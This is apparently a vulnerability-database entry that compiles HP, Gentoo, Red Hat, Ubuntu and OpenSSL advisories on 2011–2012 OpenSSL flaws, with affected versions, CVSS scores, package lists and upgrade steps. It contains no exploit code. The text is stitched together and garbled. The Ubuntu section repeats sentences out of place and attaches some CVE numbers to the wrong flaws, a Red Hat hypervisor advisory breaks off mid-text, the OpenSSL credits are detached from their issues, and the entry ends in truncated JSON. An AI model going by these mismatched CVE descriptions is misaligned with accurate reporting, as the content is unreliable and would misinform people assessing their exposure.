OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. HP SSL for OpenVMS v 1.4-453 (based on OpenSSL 0.9.8o stream) and earlier. HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows. HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-12
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: March 06, 2012 Bugs: #397695, #399365 ID: 201203-12
Synopsis
Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to cause a Denial of Service or obtain sensitive information.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.0g *>= 0.9.8t >= 1.0.0g
Description
Multiple vulnerabilities have been found in OpenSSL:
- Timing differences for decryption are exposed by CBC mode encryption in OpenSSL's implementation of DTLS (CVE-2011-4108).
- An incorrect fix for CVE-2011-4108 creates an unspecified vulnerability for DTLS applications using OpenSSL (CVE-2012-0050).
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0g"
References
[ 1 ] CVE-2011-4108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108 [ 2 ] CVE-2011-4109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109 [ 3 ] CVE-2011-4576 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576 [ 4 ] CVE-2011-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577 [ 5 ] CVE-2011-4619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619 [ 6 ] CVE-2012-0027 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027 [ 7 ] CVE-2012-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2012:0059-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html Issue date: 2012-01-24 CVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 CVE-2011-4619 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle. (CVE-2011-4108)
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection. (CVE-2011-4576)
A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data. (CVE-2011-4577)
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2011-4619)
All OpenSSL users should upgrade to these updated packages, which contain backported patches to resolve these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures 771780 - CVE-2011-4619 openssl: SGC restart DoS attack
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-1.0.0-20.el6_2.1.ppc.rpm openssl-1.0.0-20.el6_2.1.ppc64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-devel-1.0.0-20.el6_2.1.ppc.rpm openssl-devel-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-1.0.0-20.el6_2.1.s390.rpm openssl-1.0.0-20.el6_2.1.s390x.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-devel-1.0.0-20.el6_2.1.s390.rpm openssl-devel-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-perl-1.0.0-20.el6_2.1.ppc64.rpm openssl-static-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-perl-1.0.0-20.el6_2.1.s390x.rpm openssl-static-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-4108.html https://www.redhat.com/security/data/cve/CVE-2011-4576.html https://www.redhat.com/security/data/cve/CVE-2011-4577.html https://www.redhat.com/security/data/cve/CVE-2011-4619.html https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3 CJl5iUxU4cxJLOsSBESSRVs= =PMiS -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-1357-1 February 09, 2012
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Multiple vulnerabilities exist in OpenSSL that could expose sensitive information or cause applications to crash.
Software Description: - openssl: Secure Socket Layer (SSL) binary and related cryptographic tools
Details:
It was discovered that the elliptic curve cryptography (ECC) subsystem in OpenSSL, when using the Elliptic Curve Digital Signature Algorithm (ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement curves over binary fields. This could allow an attacker to determine private keys via a timing attack. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)
Adam Langley discovered that the ephemeral Elliptic Curve Diffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread safety while processing handshake messages from clients. This could allow a remote attacker to cause a denial of service via out-of-order messages that violate the TLS protocol. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. This could allow a remote attacker to recover plaintext. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-4109)
It was discovered that OpenSSL, in certain circumstances involving ECDH or ECDHE cipher suites, used an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves. This issue only affected Ubuntu 8.04 LTS. This could allow a remote attacker to cause a denial of service. This could allow a remote attacker to cause a denial of service. (CVE-2011-4619)
Andrey Kulikov discovered that the GOST block cipher engine in OpenSSL did not properly handle invalid parameters. This could allow a remote attacker to cause a denial of service via crafted data from a TLS client. This issue only affected Ubuntu 11.10. (CVE-2012-0027)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 11.10: libssl1.0.0 1.0.0e-2ubuntu4.2 openssl 1.0.0e-2ubuntu4.2
Ubuntu 11.04: libssl0.9.8 0.9.8o-5ubuntu1.2 openssl 0.9.8o-5ubuntu1.2
Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.6 openssl 0.9.8o-1ubuntu4.6
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.8 openssl 0.9.8k-7ubuntu8.8
Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.15 openssl 0.9.8g-4ubuntu3.15
After a standard system update you need to reboot your computer to make all the necessary changes. Relevant releases/architectures:
RHEV Hypervisor for RHEL-6 - noarch
- The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor.
A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. The security fixes included in this update address the following CVE numbers:
CVE-2009-5029 and CVE-2011-4609 (glibc issues)
CVE-2012-0056 (kernel issue)
CVE-2011-4108 and CVE-2012-0050 (openssl issues)
This update also fixes the following bugs:
- Previously, it was possible to begin a Hypervisor installation without any valid disks to install to.
Now, if no valid disks are found for Hypervisor installation, a message is displayed informing the user that there are no valid disks for installation. (BZ#781471)
- Previously, the user interface for the Hypervisor did not indicate whether the system was registered with Red Hat Network (RHN) Classic or RHN Satellite. As a result, customers could not easily determine the registration status of their Hypervisor installations.
The TUI has been updated to display the registration status of the Hypervisor. (BZ#788223)
-
Previously, autoinstall would fail if the firstboot or reinstall options were passed but local_boot or upgrade were not passed. Now, neither the local_boot or upgrade parameters are required for autoinstall. 788225 - autoinstall fails when local_boot or upgrade not passed on command line 788226 - rhev-hypervisor6 6.2 Update 2 Release bugzilla
Release Date: 2012-01-19 Last Updated: 2012-01-19
Potential Security Impact: Remote Denial of Service (DoS), unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location ftp://ossl098s:Secure12@ftp.usa.hp.com
HP-UX Release / Depot Name
B.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot
B.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08s or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) 19 January 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
DTLS Plaintext Recovery Attack (CVE-2011-4108)
Nadhem Alfardan and Kenny Paterson have discovered an extension of the Vaudenay padding oracle attack on CBC mode encryption which enables an efficient plaintext recovery attack against the OpenSSL implementation of DTLS. Their attack exploits timing differences arising during decryption processing. A research paper describing this attack can be found at http://www.isg.rhul.ac.uk/~kp/dtls.pdf
Thanks go to Nadhem Alfardan and Kenny Paterson of the Information Security Group at Royal Holloway, University of London (www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann seggelmann@fh-muenster.de and Michael Tuexen tuexen@fh-muenster.de for preparing the fix.
Double-free in Policy Checks (CVE-2011-4109)
If X509_V_FLAG_POLICY_CHECK is set in OpenSSL 0.9.8, then a policy check failure can lead to a double-free. The bug does not occur unless this flag is set. Users of OpenSSL 1.0.0 are not affected.
This flaw was discovered by Ben Laurie and a fix provided by Emilia Kasper ekasper@google.com of Google. This affects both clients and servers that accept SSL 3.0 handshakes: those that call SSL_CTX_new with SSLv3_{server|client}method or SSLv23{server|client}_method. It does not affect TLS. This could include sensitive contents of previously freed memory.
However, in practice, most deployments do not use SSL_MODE_RELEASE_BUFFERS and therefore have a single write buffer per connection. That write buffer is partially filled with non-sensitive, handshake data at the beginning of the connection and, thereafter, only records which are longer any any previously sent record leak any non-encrypted data. This, combined with the small number of bytes leaked per record, serves to limit to severity of this issue.
Thanks to Adam Langley agl@chromium.org for identifying and fixing this issue.
Malformed RFC 3779 Data Can Cause Assertion Failures (CVE-2011-4577)
RFC 3779 data can be included in certificates, and if it is malformed, may trigger an assertion failure. This could be used in a denial-of-service attack.
Note, however, that in the standard release of OpenSSL, RFC 3779 support is disabled by default, and in this case OpenSSL is not vulnerable. Builds of OpenSSL are vulnerable if configured with "enable-rfc3779".
Thanks to Andrew Chi, BBN Technologies, for discovering the flaw, and Rob Austein sra@hactrn.net for fixing it.
Thanks to George Kadianakis desnacked@gmail.com for identifying this issue and to Adam Langley agl@chromium.org for fixing it.
Invalid GOST parameters DoS Attack (CVE-2012-0027)
A malicious TLS client can send an invalid set of GOST parameters which will cause the server to crash due to lack of error checking. This could be used in a denial-of-service attack.
Only users of the OpenSSL GOST ENGINE are affected by this bug.
Thanks to Andrey Kulikov amdeich@gmail.com for identifying and fixing this issue.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20120104.txt
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0312", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.4" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7f" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": 